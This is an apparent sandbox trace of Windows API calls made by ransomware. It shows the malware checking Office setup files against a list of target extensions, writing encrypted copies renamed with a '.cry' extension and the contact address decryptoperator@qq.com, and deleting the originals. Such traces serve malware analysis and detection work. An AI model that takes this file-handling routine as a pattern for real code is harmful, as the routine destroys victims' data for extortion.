[0040.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.746] lstrlenW (lpString=".zip") returned 4 [0040.747] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.747] lstrlenW (lpString=".rar") returned 4 [0040.747] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.747] lstrlenW (lpString=".bz2") returned 4 [0040.747] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.747] lstrlenW (lpString=".7z") returned 3 [0040.747] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.747] lstrlenW (lpString=".dbf") returned 4 [0040.747] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.747] lstrlenW (lpString=".1cd") returned 4 [0040.747] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.747] lstrlenW (lpString=".jpg") returned 4 [0040.747] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.747] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.747] lstrlenW (lpString="Proof.XML") returned 9 [0040.747] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.748] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1457) returned 1 [0040.748] CloseHandle (hObject=0x1b8) returned 1 [0040.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 0x20 [0040.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.748] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.748] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0040.749] GetLastError () returned 0x0 [0040.749] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x5b1, lpOverlapped=0x0) returned 1 [0040.846] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0040.847] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.847] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.847] SetEndOfFile (hFile=0x178) returned 1 [0040.847] CloseHandle (hObject=0x178) returned 1 [0040.848] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.848] SetEndOfFile (hFile=0x1b8) returned 1 [0040.849] CloseHandle (hObject=0x1b8) returned 1 [0040.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.850] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 1 [0040.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.850] lstrlenW (lpString=".doc") returned 4 [0040.850] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.850] lstrlenW (lpString=".docx") returned 5 [0040.850] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.850] lstrlenW (lpString=".pdf") returned 4 [0040.850] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.850] lstrlenW (lpString=".xls") returned 4 [0040.850] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.850] lstrlenW (lpString=".xlsx") returned 5 [0040.850] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.850] lstrlenW (lpString=".ppt") returned 4 [0040.850] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.850] lstrlenW (lpString=".zip") returned 4 [0040.850] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.850] lstrlenW (lpString=".rar") returned 4 [0040.850] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.850] lstrlenW (lpString=".bz2") returned 4 [0040.850] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.850] lstrlenW (lpString=".7z") returned 3 [0040.850] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.850] lstrlenW (lpString=".dbf") returned 4 [0040.850] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.850] lstrlenW (lpString=".1cd") returned 4 [0040.850] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString=".jpg") returned 4 [0040.851] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString=".doc") returned 4 [0040.851] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString=".docx") returned 5 [0040.851] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.851] lstrlenW (lpString=".pdf") returned 4 [0040.851] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString=".xls") returned 4 [0040.851] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString=".xlsx") returned 5 [0040.851] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.851] lstrlenW (lpString=".ppt") returned 4 [0040.851] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString=".zip") returned 4 [0040.851] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.851] lstrlenW (lpString=".rar") returned 4 [0040.851] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString=".bz2") returned 4 [0040.851] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString=".7z") returned 3 [0040.851] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString=".dbf") returned 4 [0040.851] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString=".1cd") returned 4 [0040.851] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0040.851] lstrlenW (lpString=".jpg") returned 4 [0040.852] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.852] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.852] lstrlenW (lpString="Proof.XML") returned 9 [0040.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.852] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1458) returned 1 [0040.852] CloseHandle (hObject=0x1b8) returned 1 [0040.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 0x20 [0040.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.852] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.852] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0040.853] GetLastError () returned 0x0 [0040.853] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x5b2, lpOverlapped=0x0) returned 1 [0041.087] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0041.088] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.088] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.089] SetEndOfFile (hFile=0x178) returned 1 [0041.089] CloseHandle (hObject=0x178) returned 1 [0041.089] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.090] SetEndOfFile (hFile=0x1b8) returned 1 [0041.090] CloseHandle (hObject=0x1b8) returned 1 [0041.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.091] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 1 [0041.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.091] lstrlenW (lpString=".doc") returned 4 [0041.091] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.091] lstrlenW (lpString=".docx") returned 5 [0041.091] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0041.091] lstrlenW (lpString=".pdf") returned 4 [0041.091] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.091] lstrlenW (lpString=".xls") returned 4 [0041.091] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.091] lstrlenW (lpString=".xlsx") returned 5 [0041.091] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0041.091] lstrlenW (lpString=".ppt") returned 4 [0041.091] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.092] lstrlenW (lpString=".zip") returned 4 [0041.092] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.092] lstrlenW (lpString=".rar") returned 4 [0041.092] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString=".bz2") returned 4 [0041.092] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString=".7z") returned 3 [0041.092] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.092] lstrlenW (lpString=".dbf") returned 4 [0041.092] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.092] lstrlenW (lpString=".1cd") returned 4 [0041.092] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.092] lstrlenW (lpString=".jpg") returned 4 [0041.092] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.092] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.092] lstrlenW (lpString=".doc") returned 4 [0041.092] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString=".docx") returned 5 [0041.092] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0041.092] lstrlenW (lpString=".pdf") returned 4 [0041.092] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString=".xls") returned 4 [0041.092] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.092] lstrlenW (lpString=".xlsx") returned 5 [0041.093] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0041.093] lstrlenW (lpString=".ppt") returned 4 [0041.093] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.093] lstrlenW (lpString=".zip") returned 4 [0041.093] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.093] lstrlenW (lpString=".rar") returned 4 [0041.093] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.093] lstrlenW (lpString=".bz2") returned 4 [0041.093] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.093] lstrlenW (lpString=".7z") returned 3 [0041.093] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.093] lstrlenW (lpString=".dbf") returned 4 [0041.093] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.093] lstrlenW (lpString=".1cd") returned 4 [0041.093] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 98 [0041.093] lstrlenW (lpString=".jpg") returned 4 [0041.093] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.093] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.093] lstrlenW (lpString="SETUP.XML") returned 9 [0041.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.094] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=5884) returned 1 [0041.094] CloseHandle (hObject=0x1b8) returned 1 [0041.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 0x20 [0041.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.094] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.094] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0041.096] GetLastError () returned 0x0 [0041.096] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x16fc, lpOverlapped=0x0) returned 1 [0041.112] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1700, lpOverlapped=0x0) returned 1 [0041.113] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.113] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.114] SetEndOfFile (hFile=0x178) returned 1 [0041.114] CloseHandle (hObject=0x178) returned 1 [0041.115] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.115] SetEndOfFile (hFile=0x1b8) returned 1 [0041.115] CloseHandle (hObject=0x1b8) returned 1 [0041.115] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.116] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 1 [0041.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.116] lstrlenW (lpString=".doc") returned 4 [0041.116] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.116] lstrlenW (lpString=".docx") returned 5 [0041.116] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.116] lstrlenW (lpString=".pdf") returned 4 [0041.116] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.116] lstrlenW (lpString=".xls") returned 4 [0041.116] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.116] lstrlenW (lpString=".xlsx") returned 5 [0041.116] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.116] lstrlenW (lpString=".ppt") returned 4 [0041.116] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.117] lstrlenW (lpString=".zip") returned 4 [0041.117] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.117] lstrlenW (lpString=".rar") returned 4 [0041.117] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.117] lstrlenW (lpString=".bz2") returned 4 [0041.117] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.117] lstrlenW (lpString=".7z") returned 3 [0041.117] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.117] lstrlenW (lpString=".dbf") returned 4 [0041.117] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.117] lstrlenW (lpString=".1cd") returned 4 [0041.117] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 104 [0041.117] lstrlenW (lpString=".jpg") returned 4 [0041.117] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 